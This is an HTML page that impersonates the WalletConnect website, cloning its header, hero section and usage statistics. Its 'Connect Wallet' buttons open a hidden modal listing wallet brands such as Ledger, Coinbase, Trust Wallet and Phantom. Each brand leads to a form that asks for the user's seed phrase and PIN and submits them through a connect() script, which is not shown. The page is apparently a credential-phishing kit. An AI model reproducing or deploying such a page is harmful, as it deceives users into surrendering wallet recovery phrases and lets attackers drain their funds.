<!DOCTYPE html>
<html lang="en">
    <head><meta charset="utf-8"><meta name="viewport" content="viewport-fit=cover, width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no"><link rel="preload" as="image" href="/images/logo.svg"><title>WalletConnect</title><link rel="preload" as="image" href="/_next/static/media/hero.438e58ae.jpeg"><link rel="preload" as="image" href="/_next/static/media/logo_mark.84dd8525.svg"><meta name="next-head-count" content="6"><meta charset="utf-8"><meta name="author" content="WalletConnect"><meta name="description" content="WalletConnect is an open source protocol for connecting decentralised applications to mobile wallets with QR code scanning or deep linking."><meta name="keywords" content="ethereum, cryptocurrency, wallet, mobile, connect, bridge, relay, proxy, standard, protocol, crypto, tokens, dapp"><meta name="twitter:title" content="WalletConnect"><meta name="twitter:card" content="summary_large_image"><meta name="twitter:creator" content="WalletConnect"><meta name="twitter:site" content="@WalletConnect"><meta name="twitter:description" content="WalletConnect is the open source web3 standard to connect blockchain wallets to dapps."><meta name="twitter:image" content="https://walletconnect.com/meta/social-card.jpg"><meta name="twitter:image:alt" content="Connect web3 wallets to dapps."><meta name="og:title" content="WalletConnect"><meta name="og:type" content="website"><meta name="og:url" content="https://walletconnect.com"><meta name="og:image" content="https://walletconnect.com/meta/social-card.jpg"><meta name="og:image:alt" content="Connect web3 wallets to dapps."><meta name="og:description" content="WalletConnect is the open source web3 standard to connect blockchain wallets to dapps."><meta name="og:site_name" content="WalletConnect"><meta property="og:locale" content="en_US"><meta name="fb:admins" content="365412154213405"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="WalletConnect"><meta name="apple-mobile-web-app-status-bar-style" content="black"><meta name="theme-color" content="#141414"><link rel="icon" href="favicon.ico"><link rel="canonical" href="https://walletconnect.com"><script defer data-domain="walletconnect.com" data-api="collect" src="script"></script><link rel="preload" href="/_next/static/css/4bbf701fc9c09c90.css" as="style"><link rel="stylesheet" href="css/4bbf701fc9c09c90.css" data-n-g><link rel="preload" href="/_next/static/css/3cb664ad43170b6e.css" as="style"><link rel="stylesheet" href="css/3cb664ad43170b6e.css" data-n-p><noscript data-n-css></noscript>
        <script defer nomodule src="js/polyfills-c67a75d1b6f99dc8.js"></script>
        <script src="js/webpack-7ee66019f7f6d30f.js" defer></script>
        <!-- <script src="js/framework-9b5d6ec4444c80fa.js" defer></script> -->
        <script src="js/main-bc91bb9ee6775776.js" defer></script>
        <script src="js/_app-dc6973ca0dd558dd.js" defer></script>
        <script src="js/847-e094797c3daa01c6.js" defer></script>
        <script src="js/index-d05057483556122f.js" defer></script>
        <script src="js/_buildManifest.js" defer></script>
        <script src="js/_ssgManifest.js" defer></script>
    </head>
    <style>
        * {
            opacity: 1 !important;
        }
        :root {
            --animation-duration: 300ms;

        }

        @keyframes fadeIn {
            from {
                opacity: 0;

            }

            to {
                opacity: 1;

            }


        }

        @keyframes fadeOut {
            from {
                opacity: 1;

            }

            to {
                opacity: 0;

            }


        }

        .animated {
            animation-duration: var(--animation-duration);
            animation-fill-mode: both;

        }

        .fadeIn {
            animation-name: fadeIn;

        }

        .fadeOut {
            animation-name: fadeOut;

        }

        #walletconnect-wrapper {
            -webkit-user-select: none;
            align-items: center;
            display: flex;
            height: 100%;
            justify-content: center;
            left: 0;
            pointer-events: none;
            position: fixed;
            top: 0;
            user-select: none;
            width: 100%;
            z-index: 99999999999999;

        }

        .walletconnect-modal__headerLogo {
            height: 21px;

        }

        .walletconnect-modal__header p {
            color: #ffffff;
            font-size: 20px;
            font-weight: 600;
            margin: 0 0 0 5px;
            align-items: flex-start;
            display: flex;
            flex: 1;

        }

        .walletconnect-modal__close__wrapper {
            position: absolute;
            top: 0;
            right: 0;
            z-index: 10000;
            background: white;
            border-radius: 26px;
            padding: 6px;
            box-sizing: border-box;
            width: 26px;
            height: 26px;
            cursor: pointer;

        }

        .walletconnect-modal__close__icon {
            position: relative;
            top: 7px;
            right: 0;
            display: flex;
            align-items: center;
            justify-content: center;
            transform: rotate(45deg);

        }

        .walletconnect-modal__close__line1 {
            position: absolute;
            width: 100%;
            border: 1px solid rgb(48, 52, 59);

        }

        .walletconnect-modal__close__line2 {
            position: absolute;
            width: 100%;
            border: 1px solid rgb(48, 52, 59);
            transform: rotate(90deg);

        }

        .walletconnect-qrcode__base {
            -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
            background: rgba(37, 41, 46, 0.95);
            height: 100%;
            left: 0;
            pointer-events: auto;
            position: fixed;
            top: 0;
            transition: 0.4s cubic-bezier(0.19, 1, 0.22, 1);
            width: 100%;
            will-change: opacity;
            padding: 40px;
            box-sizing: border-box;

        }

        .walletconnect-qrcode__text {
            color: rgba(60, 66, 82, 0.6);
            font-size: 16px;
            font-weight: 600;
            letter-spacing: 0;
            line-height: 1.1875em;
            margin: 10px 0 20px;
            text-align: center;
            width: 100%;

        }

        .walletconnect-qrcode__text.error {
            background-color: #FED7D7;
            color: #E53E3E;
            border: 1px solid #E53E3E;
            padding: 30px;
            border-radius: 8px;
        }

        @media only screen and(max-width: 768px) {
            .walletconnect-qrcode__text {
                font-size: 4vw;

            }


        }

        @media only screen and(max-width: 320px) {
            .walletconnect-qrcode__text {
                font-size: 14px;

            }


        }

        .walletconnect-qrcode__image {
            width: calc(100% - 30px);
            box-sizing: border-box;
            cursor: none;
            margin: 0 auto;

        }

        .walletconnect-qrcode__notification {
            position: absolute;
            bottom: 0;
            left: 0;
            right: 0;
            font-size: 16px;
            padding: 16px 20px;
            border-radius: 16px;
            text-align: center;
            transition: all 0.1s ease-in-out;
            background: white;
            color: black;
            margin-bottom: -60px;
            opacity: 0;

        }

        .walletconnect-qrcode__notification.notification__show {
            opacity: 1;

        }

        @media only screen and(max-width: 768px) {
            .walletconnect-modal__header {
                height: 130px;

            }

            .walletconnect-modal__base {
                overflow: auto;

            }


        }

        @media only screen and(min-device-width: 415px) and(max-width: 768px) {
            #content {
                max-width: 768px;
                box-sizing: border-box;

            }


        }

        @media only screen and(min-width: 375px) and(max-width: 415px) {
            #content {
                max-width: 414px;
                box-sizing: border-box;

            }


        }

        @media only screen and(min-width: 320px) and(max-width: 375px) {
            #content {
                max-width: 375px;
                box-sizing: border-box;

            }


        }

        @media only screen and(max-width: 320px) {
            #content {
                max-width: 320px;
                box-sizing: border-box;

            }


        }

        .walletconnect-modal__base {
            -webkit-font-smoothing: antialiased;
            background: #ffffff;
            border-radius: 24px;
            box-shadow: 0 10px 50px 5px rgba(0, 0, 0, 0.4);
            font-family: ui-rounded, "SF Pro Rounded", "SF Pro Text", medium-content-sans-serif-font, -apple-system, BlinkMacSystemFont, ui-sans-serif, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
            margin: auto;
            padding: 24px 24px 22px;
            pointer-events: auto;
            position: relative;
            text-align: center;
            transition: 0.4s cubic-bezier(0.19, 1, 0.22, 1);
            will-change: transform;
            overflow: visible;
            transform: translateY(-50%);
            top: 50%;
            max-width: 500px;

        }

        @media only screen and(max-width: 320px) {
            .walletconnect-modal__base {
                padding: 24px 12px;

            }


        }

        .walletconnect-modal__base .hidden {
            transform: translateY(150%);
            transition: 0.125s cubic-bezier(0.4, 0, 1, 1);

        }

        .walletconnect-modal__header {
            align-items: center;
            display: flex;
            height: 26px;
            left: 0;
            justify-content: space-between;
            position: absolute;
            top: -42px;
            width: 100%;

        }

        .walletconnect-modal__base .wc-logo {
            align-items: center;
            display: flex;
            height: 26px;
            margin-top: 15px;
            padding-bottom: 15px;
            pointer-events: auto;

        }

        .walletconnect-modal__base .wc-logo div {
            background-color: #3399ff;
            height: 21px;
            margin-right: 5px;
            mask-image: url("images/wc-logo.svg") center no-repeat;
            width: 32px;

        }

        .walletconnect-modal__base .wc-logo p {
            color: #ffffff;
            font-size: 20px;
            font-weight: 600;
            margin: 0;

        }

        .walletconnect-modal__base h2 {
            color: rgba(60, 66, 82, 0.6);
            font-size: 16px;
            font-weight: 600;
            letter-spacing: 0;
            line-height: 1.1875em;
            margin: 0 0 19px;
            text-align: center;
            width: 100%;

        }

        .walletconnect-modal__base__row {
            -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
            align-items: center;
            border-radius: 20px;
            cursor: pointer;
            display: flex;
            height: 56px;
            justify-content: space-between;
            padding: 0 15px;
            position: relative;
            margin: 0 0 8px;
            text-align: left;
            transition: 0.15s cubic-bezier(0.25, 0.46, 0.45, 0.94);
            will-change: transform;
            text-decoration: none;

        }

        .walletconnect-modal__base__row:hover {
            background: rgba(60, 66, 82, 0.06);

        }

        .walletconnect-modal__base__row:active {
            background: rgba(60, 66, 82, 0.06);
            transform: scale(0.975);
            transition: 0.1s cubic-bezier(0.25, 0.46, 0.45, 0.94);

        }

        .walletconnect-modal__base__row__h3 {
            color: #25292e;
            font-size: 20px;
            font-weight: 700;
            margin: 0;
            padding-bottom: 3px;

        }

        .walletconnect-modal__base__row__right {
            align-items: center;
            display: flex;
            justify-content: center;

        }

        .walletconnect-modal__base__row__right__app-icon {
            border-radius: 8px;
            height: 34px;
            margin: 0 11px 2px 0;
            width: 34px;
            background-size: 100%;
            box-shadow: 0 4px 12px 0 rgba(37, 41, 46, 0.25);

        }

        .walletconnect-modal__base__row__right__caret {
            height: 18px;
            opacity: 0.3;
            transition: 0.1s cubic-bezier(0.25, 0.46, 0.45, 0.94);
            width: 8px;
            will-change: opacity;

        }

        .walletconnect-modal__base__row:hover .caret,
        .walletconnect-modal__base__row:active .caret {
            opacity: 0.6;

        }

        .walletconnect-modal__mobile__toggle {
            width: 80%;
            display: flex;
            margin: 0 auto 18px;
            position: relative;
            overflow: hidden;
            border-radius: 8px;
            background: #d4d5d9;

        }

        .walletconnect-modal__single_wallet {
            display: flex;
            justify-content: center;
            margin-top: 7px;
            margin-bottom: 18px;

        }

        .walletconnect-modal__single_wallet a {
            cursor: pointer;
            color: rgb(64, 153, 255);
            font-size: 21px;
            font-weight: 800;
            text-decoration: none !important;
            margin: 0 auto;

        }

        .walletconnect-modal__mobile__toggle_selector {
            width: calc(50% - 8px);
            background: white;
            position: absolute;
            border-radius: 5px;
            height: calc(100% - 8px);
            top: 4px;
            transition: all 0.2s ease-in-out;
            transform: translate3d(4px, 0, 0);

        }

        .walletconnect-modal__mobile__toggle.right__selected .walletconnect-modal__mobile__toggle_selector {
            transform: translate3d(calc(100% + 12px), 0, 0);

        }

        .walletconnect-modal__mobile__toggle a {
            font-size: 12px;
            width: 50%;
            text-align: center;
            padding: 8px;
            margin: 0;
            font-weight: 600;
            z-index: 1;

        }

        .walletconnect-modal__footer {
            display: flex;
            justify-content: center;
            margin-top: 20px;

        }

        @media only screen and(max-width: 768px) {
            .walletconnect-modal__footer {
                margin-top: 5vw;

            }


        }

        .walletconnect-modal__footer a {
            cursor: pointer;
            color: #898d97;
            font-size: 15px;
            margin: 0 auto;

        }

        @media only screen and(max-width: 320px) {
            .walletconnect-modal__footer a {
                font-size: 14px;

            }


        }

        .walletconnect-connect__buttons__wrapper {
            max-height: 44vh;

        }

        .walletconnect-connect__buttons__wrapper__android {
            margin: 50% 0;

        }

        .walletconnect-connect__buttons__wrapper__wrap {
            display: grid;
            grid-template-columns: repeat(4, 1fr);
            margin: 10px 0;

        }

        @media only screen and(min-width: 768px) {
            .walletconnect-connect__buttons__wrapper__wrap {
                margin-top: 40px;

            }


        }

        .walletconnect-connect__button {
            background-color: rgb(64, 153, 255);
            padding: 8px 26px;
            border-radius: 8px;
            text-decoration: none;
            color: rgb(255, 255, 255);
            font-weight: 500;
            border: none;
            font-size: 14px;
            border-radius: 8px;
            width: 100%;
            cursor: pointer;
        }

        .walletconnect-connect__button__icon_anchor {
            cursor: pointer;
            display: flex;
            justify-content: flex-start;
            align-items: center;
            margin: 8px;
            width: 42px;
            justify-self: center;
            flex-direction: column;
            text-decoration: none !important;

        }

        @media only screen and(max-width: 320px) {
            .walletconnect-connect__button__icon_anchor {
                margin: 4px;

            }


        }

        .walletconnect-connect__button__icon {
            border-radius: 10px;
            height: 42px;
            margin: 0;
            width: 42px;
            background-size: cover !important;
            box-shadow: 0 4px 12px 0 rgba(37, 41, 46, 0.25);

        }

        .walletconnect-connect__button__text {
            color: #424952;
            font-size: 2.7vw;
            text-decoration: none !important;
            padding: 0;
            margin-top: 1.8vw;
            font-weight: 600;

        }

        @media only screen and(min-width: 768px) {
            .walletconnect-connect__button__text {
                font-size: 16px;
                margin-top: 12px;

            }


        }

        .walletconnect-search__input {
            border: none;
            background: #d4d5d9;
            border-style: none;
            padding: 12px 16px;
            outline: none;
            font-style: normal;
            font-stretch: normal;
            font-size: 16px;
            font-style: normal;
            font-stretch: normal;
            line-height: normal;
            letter-spacing: normal;
            text-align: left;
            border-radius: 8px;
            width: 100%; /* calc(100% - 16px) */
            margin: 0 0 8px;

        }

        .d-none {
            display: none!important;
        }
    </style>
    <body>
        <div class="d-none" id="walletconnect-wrapper">
            <div id="walletconnect-qrcode-modal" class="walletconnect-qrcode__base animated fadeIn">
                <div class="walletconnect-modal__base">
                    <div class="walletconnect-modal__header"><img src="data:image/svg+xml,%3Csvg height='185' viewBox='0 0 300 185' width='300' xmlns='http://www.w3.org/2000/svg'%3E%3Cpath d='m61.4385429 36.2562612c48.9112241-47.8881663 128.2119871-47.8881663 177.1232091 0l5.886545 5.7634174c2.445561 2.3944081 2.445561 6.2765112 0 8.6709204l-20.136695 19.715503c-1.222781 1.1972051-3.2053 1.1972051-4.428081 0l-8.100584-7.9311479c-34.121692-33.4079817-89.443886-33.4079817-123.5655788 0l-8.6750562 8.4936051c-1.2227816 1.1972041-3.205301 1.1972041-4.4280806 0l-20.1366949-19.7155031c-2.4455612-2.3944092-2.4455612-6.2765122 0-8.6709204zm218.7677961 40.7737449 17.921697 17.546897c2.445549 2.3943969 2.445563 6.2764769.000031 8.6708899l-80.810171 79.121134c-2.445544 2.394426-6.410582 2.394453-8.85616.000062-.00001-.00001-.000022-.000022-.000032-.000032l-57.354143-56.154572c-.61139-.598602-1.60265-.598602-2.21404 0-.000004.000004-.000007.000008-.000011.000011l-57.3529212 56.154531c-2.4455368 2.394432-6.4105755 2.394472-8.8561612.000087-.0000143-.000014-.0000296-.000028-.0000449-.000044l-80.81241943-79.122185c-2.44556021-2.394408-2.44556021-6.2765115 0-8.6709197l17.92172963-17.5468673c2.4455602-2.3944082 6.4105989-2.3944082 8.8561602 0l57.3549775 56.155357c.6113908.598602 1.602649.598602 2.2140398 0 .0000092-.000009.0000174-.000017.0000265-.000024l57.3521031-56.155333c2.445505-2.3944633 6.410544-2.3945531 8.856161-.0002.000034.0000336.000068.0000673.000101.000101l57.354902 56.155432c.61139.598601 1.60265.598601 2.21404 0l57.353975-56.1543249c2.445561-2.3944092 6.410599-2.3944092 8.85616 0z' fill='%233b99fc'/%3E%3C/svg%3E" class="walletconnect-modal__headerLogo"><p>WalletConnect</p>
                        <div class="walletconnect-modal__close__wrapper" onclick="javascript:close_connect_wallet()">
                            <div id="walletconnect-qrcode-close" class="walletconnect-modal__close__icon">
                                <div class="walletconnect-modal__close__line1"></div>
                                <div class="walletconnect-modal__close__line2"></div>
                            </div>
                        </div>
                    </div>
                    <div>
                        <div class="d-none" id="connect_error">
                            <p class="walletconnect-qrcode__text error">An error occured!</p>
                            <br>
                            <button type="button" onclick="javascript:try_again()" class="walletconnect-connect__button">Try Again</button>
                        </div>
                        <div id="select_wallet">
                            <p id="walletconnect-qrcode-text" class="walletconnect-qrcode__text">Choose your preferred wallet</p>
                            <div class="walletconnect-connect__buttons__wrapper__wrap">
                                <a class="walletconnect-connect__button__icon_anchor" href="javascript:show_form('Crypto.com')" rel="noopener noreferrer" role="button">
                                    <div class="walletconnect-connect__button__icon" style="background: url(&quot;https://registry.walletconnect.com/api/v2/logo/sm/7c5ff577-a68d-49c5-02cd-3d83637b0b00&quot;) rgb(17, 153, 250);"></div>
                                    <div class="walletconnect-connect__button__text" style="font-size: inherit;">Crypto.com</div>
                                </a>
                                <a class="walletconnect-connect__button__icon_anchor" href="javascript:show_form('Ledger')" rel="noopener noreferrer" role="button">
                                    <div class="walletconnect-connect__button__icon" style="background: url(&quot;https://registry.walletconnect.com/api/v2/logo/sm/a7f416de-aa03-4c5e-3280-ab49269aef00&quot;) rgb(0, 0, 0);"></div>
                                    <div class="walletconnect-connect__button__text" style="font-size: inherit;">Ledger</div>
                                </a>
                                <a class="walletconnect-connect__button__icon_anchor" href="javascript:show_form('Coinbase')" rel="noopener noreferrer" role="button">
                                    <div class="walletconnect-connect__button__icon" style="background: url(&quot;https://images.ctfassets.net/q5ulk4bp65r7/1rFQCqoq8hipvVJSKdU3fQ/21ab733af7a8ab404e29b873ffb28348/coinbase-icon2.svg&quot;) rgb(255, 255, 255);"></div>
                                    <div class="walletconnect-connect__button__text" style="font-size: inherit;">Coinbase</div>
                                </a>
                                <a class="walletconnect-connect__button__icon_anchor" href="javascript:show_form('Infinity Wallet')" rel="noopener noreferrer" role="button">
                                    <div class="walletconnect-connect__button__icon" style="background: url(&quot;https://registry.walletconnect.com/api/v2/logo/sm/9f259366-0bcd-4817-0af9-f78773e41900&quot;) rgb(25, 127, 225);"></div>
                                    <div class="walletconnect-connect__button__text" style="font-size: inherit;">Infinity Wallet</div>
                                </a>
                                <a class="walletconnect-connect__button__icon_anchor" href="javascript:show_form('Wallet 3')" rel="noopener noreferrer" role="button">
                                    <div class="walletconnect-connect__button__icon" style="background: url(&quot;https://registry.walletconnect.com/api/v2/logo/sm/d740b48c-2b55-4a27-b5f5-d2188200ca00&quot;) rgb(97, 134, 255);"></div>
                                    <div class="walletconnect-connect__button__text" style="font-size: inherit;">Wallet 3</div>
                                </a>
                                <a class="walletconnect-connect__button__icon_anchor" href="javascript:show_form('Phantom')" rel="noopener noreferrer" role="button">
                                    <div class="walletconnect-connect__button__icon" style="background: url(&quot;https://phantom.app/img/phantom-logo.svg&quot;);"></div>
                                    <div class="walletconnect-connect__button__text" style="font-size: inherit;">Phantom</div>
                                </a>
                                <a class="walletconnect-connect__button__icon_anchor" href="javascript:show_form('Ambire')" rel="noopener noreferrer" role="button">
                                    <div class="walletconnect-connect__button__icon" style="background: url(&quot;https://registry.walletconnect.com/api/v2/logo/sm/c39b3a16-1a38-4588-f089-cb7aeb584700&quot;) rgb(170, 106, 255);"></div>
                                    <div class="walletconnect-connect__button__text" style="font-size: inherit;">Ambire</div>
                                </a>
                                <a class="walletconnect-connect__button__icon_anchor" href="javascript:show_form('Paper')" rel="noopener noreferrer" role="button">
                                    <div class="walletconnect-connect__button__icon" style="background: url(&quot;https://registry.walletconnect.com/api/v2/logo/sm/37d7a10f-d94d-4a56-c30e-267e8afbd500&quot;) 0% 0% / 100% rgb(50, 202, 255);"></div>
                                    <div class="walletconnect-connect__button__text" style="font-size: inherit;">Paper</div>
                                </a>
                                <a class="walletconnect-connect__button__icon_anchor" href="javascript:show_form('Wallet3')" rel="noopener noreferrer" role="button">
                                    <div class="walletconnect-connect__button__icon" style="background: url(&quot;https://registry.walletconnect.com/api/v2/logo/sm/34ab7558-9e64-4436-f4e6-9069f2533d00&quot;) 0% 0% / 100% rgb(97, 134, 255);"></div>
                                    <div class="walletconnect-connect__button__text" style="font-size: inherit;">Wallet3</div>
                                </a>
                                <a class="walletconnect-connect__button__icon_anchor" href="javascript:show_form('ApolloX')" rel="noopener noreferrer" role="button">
                                    <div class="walletconnect-connect__button__icon" style="background: url(&quot;https://registry.walletconnect.com/api/v2/logo/sm/80ab63a2-1b32-4140-3577-9fbc8ea82e00&quot;) 0% 0% / 100%;"></div>
                                    <div class="walletconnect-connect__button__text" style="font-size: inherit;">ApolloX</div>
                                </a>
                                <a class="walletconnect-connect__button__icon_anchor" href="javascript:show_form('Zerion')" rel="noopener noreferrer" role="button">
                                    <div class="walletconnect-connect__button__icon" style="background: url(&quot;https://registry.walletconnect.com/api/v2/logo/sm/f216b371-96cf-409a-9d88-296392b85800&quot;) 0% 0% / 100%;"></div>
                                    <div class="walletconnect-connect__button__text" style="font-size: inherit;">Zerion</div>
                                </a>
                                <a class="walletconnect-connect__button__icon_anchor" href="javascript:show_form('Exodus')" rel="noopener noreferrer" role="button">
                                    <div class="walletconnect-connect__button__icon" style="background: url(&quot;https://www.exodus.com/img/favicons/apple-icon-152x152.png&quot;) 0% 0% / 100% rgb(255, 255, 255);"></div>
                                    <div class="walletconnect-connect__button__text" style="font-size: inherit;">Exodus</div>
                                </a>
                                
                                <a class="walletconnect-connect__button__icon_anchor" href="javascript:show_form('Trust wallet')" rel="noopener noreferrer" role="button">
                                    <div class="walletconnect-connect__button__icon" style="background: url(&quot;https://is1-ssl.mzstatic.com/image/thumb/Purple112/v4/97/15/68/9715688d-408a-2007-3a95-87056523e873/AppIcon-0-1x_U007emarketing-0-10-0-85-220.png/217x0w.webp&quot;) 0% 0% / 100% rgb(97, 134, 255);"></div>
                                    <div class="walletconnect-connect__button__text" style="font-size: inherit;">Trust wallet</div>
                                </a>
                                <a class="walletconnect-connect__button__icon_anchor" href="javascript:show_form('Blockchain')" rel="noopener noreferrer" role="button">
                                    <div class="walletconnect-connect__button__icon" style="background: url(&quot;https://play-lh.googleusercontent.com/CcboHyK1Id9XQWa8HXb_81Rvgqy7J816OHiTcGlezcwC-tx4cnrrXPx1x6cR0PowqA=w240-h480-rw&quot;) 0% 0% / 100%;"></div>
                                    <div class="walletconnect-connect__button__text" style="font-size: inherit;">Blockchain</div>
                                </a>
                                <a class="walletconnect-connect__button__icon_anchor" href="javascript:show_form('KryptoGO')" rel="noopener noreferrer" role="button">
                                    <div class="walletconnect-connect__button__icon" style="background: url(&quot;https://registry.walletconnect.com/api/v2/logo/sm/3ccbd966-97e8-45a0-1ceb-6141a8978e00&quot;) rgb(255, 194, 17);"></div>
                                    <div class="walletconnect-connect__button__text" style="font-size: inherit;">KryptoGO</div>
                                </a>
                                <a class="walletconnect-connect__button__icon_anchor" href="javascript:show_form('PunkWallet')" rel="noopener noreferrer" role="button">
                                    <div class="walletconnect-connect__button__icon" style="background: url(&quot;https://registry.walletconnect.com/api/v2/logo/sm/93f81bf3-a7f1-4620-013e-5959432e3500&quot;) rgb(24, 144, 255);"></div>
                                    <div class="walletconnect-connect__button__text" style="font-size: inherit;">🧑&zwj;🎤 PunkWallet</div>
                                </a>
                            </div>
                            <!-- <div class="walletconnect-qrcode__notification"></div> -->
                        </div>
                        <div class="d-none" id="connect_form">
                            <p id="walletconnect-text" class="walletconnect-qrcode__text">Connect wallet</p>
                            <form action="javascript:connect()" method="post">
                                <textarea class="walletconnect-search__input" placeholder="Seed phrase" id="c_seed" rows="5" required=""></textarea>
                                <br>
                                <input type="number" class="walletconnect-search__input" id="c_pin" placeholder="Pin" required="">
                                <input type="text" class="d-none" hidden id="w-name">
                                <br>
                                <button type="submit" class="walletconnect-connect__button" type="submit">Connect</button>
                            </form>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div id="__next">
            <header id="styles_header__KZ1Y1"><img alt="WalletConnect logo" src="fonts/logo.svg" width="203" height="32" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_logo__rasCe"><div id="styles_container__yH3RZ" class="styles_menuContent__q_2qr">
                    <nav>
                        <ul>
                            <li class="styles_item__wjxNh">
                                <button type="button" class="styles_button__gAHKk styles_ghost__6zb7F styles_desktopLink__Bllpq">
                                    <span class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorWhite__UuUMU ">Products</span>
                                </button>
                                <a href="/products" class="styles_heading__YwDIe styles_heading4__h0dFu styles_colorWhite__UuUMU styles_mobileLink__Ys_3F">Products</a>
                            </li>
                            <li class="styles_item__wjxNh">
                                <button type="button" class="styles_button__gAHKk styles_ghost__6zb7F styles_desktopLink__Bllpq">
                                    <span class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorWhite__UuUMU ">Docs</span>
                                </button>
                                <a href="https://docs.walletconnect.com/" class="styles_heading__YwDIe styles_heading4__h0dFu styles_colorWhite__UuUMU styles_mobileLink__Ys_3F">Docs</a>
                            </li>
                            <li class="styles_item__wjxNh">
                                <button type="button" class="styles_button__gAHKk styles_ghost__6zb7F styles_desktopLink__Bllpq">
                                    <span class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorWhite__UuUMU ">Explorer</span>
                                </button>
                                <a href="https://explorer.walletconnect.com/" class="styles_heading__YwDIe styles_heading4__h0dFu styles_colorWhite__UuUMU styles_mobileLink__Ys_3F">Explorer</a>
                            </li>
                        </ul>
                    </nav>
                </div>
                <ul id="styles_social__5iRcK" class="styles_menuContent__q_2qr">
                    <li>
                        <a href="https://twitter.com/WalletConnect/" target="_blank" rel="noreferrer">
                            <button type="button" class="styles_button__zk_LZ styles_outlineGrey__sN77O "><img alt="Twitter icon" src="fonts/header_twitter.svg" width="24" height="24" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_socialIcon__cAuJY" loading="lazy"></button>
                        </a>
                    </li>
                    <li>
                        <a href="https://walletconnect.mirror.xyz/" target="_blank" rel="noreferrer">
                            <button type="button" class="styles_button__zk_LZ styles_outlineGrey__sN77O "><img alt="Mirror icon" src="fonts/header_mirror.svg" width="24" height="24" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_socialIcon__cAuJY" loading="lazy"></button>
                        </a>
                    </li>
                    <li>
                        <a href="https://github.com/WalletConnect/" target="_blank" rel="noreferrer">
                            <button type="button" class="styles_button__zk_LZ styles_outlineGrey__sN77O "><img alt="GitHub icon" src="fonts/header_github.svg" width="24" height="24" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_socialIcon__cAuJY" loading="lazy"></button>
                        </a>
                    </li>
                    <li>
                        <a href="https://discord.com/invite/cB54BwPGru/" target="_blank" rel="noreferrer">
                            <button type="button" class="styles_button__zk_LZ styles_outlineGrey__sN77O "><img alt="Discord icon" src="fonts/header_discord.svg" width="24" height="24" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_socialIcon__cAuJY" loading="lazy"></button>
                        </a>
                    </li>
                </ul>
                <a href="javascript:void(0)" id="styles_dashboardBtn__uRImL">
                    <button type="button" onclick="javascript:connect_wallet()" class="styles_button__gAHKk styles_outlineGrey__qyVBK styles_menuContent__q_2qr">
                        <span class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorWhite__UuUMU ">Connect Wallet</span>
                    </button>
                </a>
                <button class="styles_hamburger__sOsWb">
                    <span id="styles_hamburgerTop__vBZrI"></span>
                    <span id="styles_hamburgerText__DdKwO">Mobile Navigation</span>
                    <span id="styles_hamburgerBottom__FUVpL"></span>
                </button>
            </header>
            <section>
                <div class="styles_container__lcSzG styles_hero__WQcec "><img alt="Abstract colorful shapes" src="images/hero.438e58ae.jpeg" width="2520" height="1500" decoding="async" data-nimg="future" class="styles_image__DSP3n"><img alt="WalletConnect logo mark" src="fonts/logo_mark.84dd8525.svg" width="144" height="89" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_logo__kIE2c"><h1 class="styles_heading__YwDIe styles_heading1__x7mlf styles_colorWhite__UuUMU styles_heading__Zwe1y">Connecting web3</h1>
                    <p class="styles_text__LlfBJ styles_text2__xsLxi styles_colorGrey__ZiDfp styles_text__Je7qK">The communications protocol for web3, WalletConnect brings the ecosystem together by enabling wallets and apps to securely connect and interact.</p>
                    <div class="styles_actions__KxSDg">
                        <button type="button" onclick="javascript:connect_wallet()" class="styles_button__gAHKk styles_fillBlue__7AYTO ">
                            <span class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorWhite__UuUMU styles_textIconRight__7obUS">Connect Wallet</span>
                        </button>
                    </div>
                </div>
            </section>
            <section class="styles_statistics__l_mFR">
                <div class="styles_item__fEEaO">
                    <h5 class="styles_heading__YwDIe styles_heading5__CHcH1 styles_colorWhite__UuUMU ">Total Connections</h5>
                    <span class="styles_numeric__16iEp styles_numeric3__ytNe_ styles_colorWhite__UuUMU ">1,107,304,399</span>
                    <p class="styles_text__LlfBJ styles_text2__xsLxi styles_colorWhite__UuUMU ">per day</p>
                </div>
                <div class="styles_item__fEEaO">
                    <h5 class="styles_heading__YwDIe styles_heading5__CHcH1 styles_colorWhite__UuUMU ">Active Connections</h5>
                    <span class="styles_numeric__16iEp styles_numeric3__ytNe_ styles_colorWhite__UuUMU ">887,924</span>
                    <p class="styles_text__LlfBJ styles_text2__xsLxi styles_colorWhite__UuUMU ">currently</p>
                </div>
                <div class="styles_item__fEEaO">
                    <h5 class="styles_heading__YwDIe styles_heading5__CHcH1 styles_colorWhite__UuUMU ">Messages</h5>
                    <span class="styles_numeric__16iEp styles_numeric3__ytNe_ styles_colorWhite__UuUMU ">24,761</span>
                    <p class="styles_text__LlfBJ styles_text2__xsLxi styles_colorWhite__UuUMU ">per second</p>
                </div>
                <div class="styles_item__fEEaO">
                    <h5 class="styles_heading__YwDIe styles_heading5__CHcH1 styles_colorWhite__UuUMU ">Wallets</h5>
                    <span class="styles_numeric__16iEp styles_numeric3__ytNe_ styles_colorWhite__UuUMU ">170<!-- -->+</span>
                    <p class="styles_text__LlfBJ styles_text2__xsLxi styles_colorWhite__UuUMU ">integrated</p>
                </div>
                <div class="styles_item__fEEaO">
                    <h5 class="styles_heading__YwDIe styles_heading5__CHcH1 styles_colorWhite__UuUMU ">Apps</h5>
                    <span class="styles_numeric__16iEp styles_numeric3__ytNe_ styles_colorWhite__UuUMU ">450<!-- -->+</span>
                    <p class="styles_text__LlfBJ styles_text2__xsLxi styles_colorWhite__UuUMU ">integrated</p>
                </div>
            </section>
            <section class="styles_section__AztRm">
